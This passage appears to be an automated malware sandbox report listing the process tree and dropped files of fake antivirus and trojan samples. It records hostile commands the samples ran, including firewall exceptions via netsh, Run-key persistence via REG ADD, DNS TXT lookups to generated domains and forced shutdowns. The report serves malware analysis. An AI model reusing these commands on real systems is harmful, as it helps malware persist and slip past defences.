                                                                            • Suspicious use of SendNotifyMessage
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3052
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh "firewall" add allowedprogram "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\[email protected]" "Internet Security Guard" ENABLE
                                                                              2⤵
                                                                                PID:3108
                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                nslookup -q=txt djmuz612iirstah.com 8.8.8.8
                                                                                2⤵
                                                                                  PID:5160
                                                                                • C:\Windows\SysWOW64\Wbem\mofcomp.exe
                                                                                  mofcomp "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\InternetSecurityGuard\6137.mof"
                                                                                  2⤵
                                                                                    PID:3208
                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                    nslookup -q=txt djmuz612iirstah.net 8.8.8.8
                                                                                    2⤵
                                                                                      PID:5528
                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                      nslookup -q=txt djmuz612iirstah.com 208.67.222.222
                                                                                      2⤵
                                                                                        PID:5640
                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                        nslookup -q=txt djmuz612iirstah.net 208.67.222.222
                                                                                        2⤵
                                                                                          PID:5776
                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                          nslookup -q=txt djmuz612iirstah.com 8.8.4.4
                                                                                          2⤵
                                                                                            PID:5848
                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                            nslookup -q=txt djmuz612iirstah.net 8.8.4.4
                                                                                            2⤵
                                                                                              PID:5916
                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                              nslookup -q=txt djmuz612iirstah.com 208.67.220.220
                                                                                              2⤵
                                                                                                PID:6076
                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                nslookup -q=txt djmuz612iirstah.net 208.67.220.220
                                                                                                2⤵
                                                                                                  PID:1632
                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                  nslookup -q=txt ddlua510gpucdip.com 8.8.8.8
                                                                                                  2⤵
                                                                                                    PID:4336
                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                    nslookup -q=txt ddlua510gpucdip.net 8.8.8.8
                                                                                                    2⤵
                                                                                                      PID:1300
                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                      nslookup -q=txt ddlua510gpucdip.com 208.67.222.222
                                                                                                      2⤵
                                                                                                        PID:1312
                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                        nslookup -q=txt ddlua510gpucdip.net 208.67.222.222
                                                                                                        2⤵
                                                                                                          PID:5192
                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                          nslookup -q=txt ddlua510gpucdip.com 8.8.4.4
                                                                                                          2⤵
                                                                                                            PID:5412
                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                            nslookup -q=txt ddlua510gpucdip.net 8.8.4.4
                                                                                                            2⤵
                                                                                                              PID:5164
                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                              nslookup -q=txt ddlua510gpucdip.com 208.67.220.220
                                                                                                              2⤵
                                                                                                                PID:5248
                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                nslookup -q=txt ddlua510gpucdip.net 208.67.220.220
                                                                                                                2⤵
                                                                                                                  PID:5332
                                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                  nslookup -q=txt clls406szhipps.com 8.8.8.8
                                                                                                                  2⤵
                                                                                                                    PID:5544
                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                    nslookup -q=txt clls406szhipps.net 8.8.8.8
                                                                                                                    2⤵
                                                                                                                      PID:5580
                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                      nslookup -q=txt clls406szhipps.com 208.67.222.222
                                                                                                                      2⤵
                                                                                                                        PID:5564
                                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                        nslookup -q=txt clls406szhipps.net 208.67.222.222
                                                                                                                        2⤵
                                                                                                                          PID:5700
                                                                                                                        • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                          nslookup -q=txt clls406szhipps.com 8.8.4.4
                                                                                                                          2⤵
                                                                                                                            PID:5776
                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                            nslookup -q=txt clls406szhipps.net 8.8.4.4
                                                                                                                            2⤵
                                                                                                                              PID:5888
                                                                                                                            • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                              nslookup -q=txt clls406szhipps.com 208.67.220.220
                                                                                                                              2⤵
                                                                                                                                PID:6024
                                                                                                                              • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                nslookup -q=txt clls406szhipps.net 208.67.220.220
                                                                                                                                2⤵
                                                                                                                                  PID:5940
                                                                                                                              • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Live Protection Suite 2019\[email protected]
                                                                                                                                "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Live Protection Suite 2019\[email protected]"
                                                                                                                                1⤵
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:3160
                                                                                                                                • C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
                                                                                                                                  "C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:5512
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                    dw20.exe -x -s 1576
                                                                                                                                    3⤵
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Enumerates system info in registry
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:5288
                                                                                                                              • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Movie.mpeg\[email protected]
                                                                                                                                "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Movie.mpeg\[email protected]"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5692
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 608
                                                                                                                                  2⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:5384
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5692 -ip 5692
                                                                                                                                1⤵
                                                                                                                                  PID:5224
                                                                                                                                • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\NavaShield\[email protected]
                                                                                                                                  "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\NavaShield\[email protected]"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:6128
                                                                                                                                • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\PC Defender\[email protected]
                                                                                                                                  "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\PC Defender\[email protected]"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:764
                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"
                                                                                                                                    2⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    PID:4420
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2492
                                                                                                                                  • C:\Windows\system32\srtasks.exe
                                                                                                                                    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                    2⤵
                                                                                                                                      PID:2976
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 559009B7B22822FEF8025D169E60A852 E Global\MSI0000
                                                                                                                                      2⤵
                                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:5292
                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    PID:4868
                                                                                                                                  • C:\Windows\System32\msiexec.exe
                                                                                                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\PC Defender v2\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    PID:5248
                                                                                                                                  • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\RegistrySmart\[email protected]
                                                                                                                                    "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\RegistrySmart\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5772
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-IIG2L.tmp\is-C29PP.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-IIG2L.tmp\is-C29PP.tmp" /SL4 $4088E "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\RegistrySmart\[email protected]" 779923 55808
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5784
                                                                                                                                  • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\SE2011\[email protected]
                                                                                                                                    "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\SE2011\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1460
                                                                                                                                  • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]
                                                                                                                                    "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]"
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:6028
                                                                                                                                    • C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]
                                                                                                                                      "C:\Users\Admin\Downloads\MalwareDatabase-master\rogues\Security Central\[email protected]"
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:6016
                                                                                                                                      • C:\Program Files (x86)\Security Central\Security Central.exe
                                                                                                                                        "C:\Program Files (x86)\Security Central\Security Central.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5652
                                                                                                                                        • C:\Program Files (x86)\Security Central\Security Central.exe
                                                                                                                                          "C:\Program Files (x86)\Security Central\Security Central.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:4000
                                                                                                                                  • C:\Windows\system32\sihost.exe
                                                                                                                                    sihost.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5616
                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:5364
                                                                                                                                    • C:\Windows\system32\sihost.exe
                                                                                                                                      sihost.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5468
                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                          explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                          2⤵
                                                                                                                                          • Modifies Installed Components in the registry
                                                                                                                                          • Enumerates connected drives
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2760
                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                        1⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4336
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:6000
                                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                                                                                        1⤵
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5316
                                                                                                                                      • C:\Windows\system32\sihost.exe
                                                                                                                                        sihost.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:692
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                            2⤵
                                                                                                                                              PID:2604
                                                                                                                                          • C:\Windows\system32\sihost.exe
                                                                                                                                            sihost.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:3120
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                explorer.exe /LOADSAVEDWINDOWS
                                                                                                                                                2⤵
                                                                                                                                                  PID:696
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                explorer.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:2204
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4648
                                                                                                                                                    • C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\FakeActivation\[email protected]
                                                                                                                                                      "C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\FakeActivation\[email protected]"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1516
                                                                                                                                                        • C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
                                                                                                                                                          "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3280
                                                                                                                                                        • C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]
                                                                                                                                                          "C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3784
                                                                                                                                                            • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                                              "C:\Windows\System32\shutdown.exe" /r /t 6 /f
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5524
• C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2503326475 /t REG_SZ /d "C:\Users\Admin\2503326475\2503326475.exe" /f
  3⤵
    PID:1480
• C:\Windows\SysWOW64\reg.exe
  REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2503326475 /t REG_SZ /d "C:\Users\Admin\2503326475\2503326475.exe" /f
  4⤵
    PID:5044
• C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 2503326475_del /t REG_SZ /d "cmd /c del \"C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]\"" /f
  3⤵
    PID:3224
• C:\Windows\SysWOW64\reg.exe
  REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 2503326475_del /t REG_SZ /d "cmd /c del \"C:\Users\Admin\Downloads\MalwareDatabase-master\trojans\HMBlocker\[email protected]\"" /f
  4⤵
    PID:4668
• C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
  1⤵
    PID:4588
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
    PID:3024
• C:\Windows\system32\sihost.exe
  sihost.exe
  1⤵
    PID:3680
• C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
    PID:5252
• C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
  1⤵
    PID:5680
• C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  1⤵
    PID:3084
• C:\Windows\system32\sihost.exe
  sihost.exe
  1⤵
    PID:892
• C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
    PID:5940
• C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
  1⤵
    PID:4180
• C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
  1⤵
    PID:4896
• C:\Windows\explorer.exe
  explorer.exe
  1⤵
    PID:4884
• C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  1⤵
    PID:2292
• C:\Windows\System32\PickerHost.exe
  C:\Windows\System32\PickerHost.exe -Embedding
  1⤵
    PID:3088
• C:\Windows\system32\LogonUI.exe
  "LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d
  1⤵
    PID:4300

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Config.Msi\e68d774.rbs
  Filesize: 10KB


• C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
  Filesize: 704KB


• C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
  Filesize: 7.2MB


• C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg
  Filesize: 185B


• C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg
  Filesize: 381B


• C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg
  Filesize: 1KB


• C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg
  Filesize: 3KB


                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                5KB

                                                                                                                                                                                              • C:\ProgramData\ISJBKZRWGLG\ISPGMGVYRZG.cfg

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                17KB

                                                                                                                                                                                              • C:\ProgramData\a476e\IS87e.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                2.3MB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\6AdwCleaner.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                168KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                152B

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                111B

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                5KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                5KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                25KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                2KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe6098e9.TMP

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                538B

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                16B

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                16B

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                10KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                11KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133483148670665359.txt

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                67KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                870KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\{FDC44F3F-43E3-4E40-A590-E26906863B7A}.png

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                57KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                38KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                70KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                102KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                2KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3o1s7lgd.default-release\prefs.js

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6KB

                                                                                                                                                                                              • C:\Windows\302746537.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                22KB

                                                                                                                                                                                              • C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                153KB

                                                                                                                                                                                              • C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                21KB

                                                                                                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1024KB

                                                                                                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                              • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                              • memory/1380-295-0x0000000005B90000-0x0000000005B91000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-296-0x0000000005BA0000-0x0000000005BA1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-297-0x0000000005BB0000-0x0000000005BB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-298-0x0000000005BC0000-0x0000000005BC1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-299-0x0000000005BD0000-0x0000000005BD1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-300-0x0000000005BE0000-0x0000000005BE1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-348-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

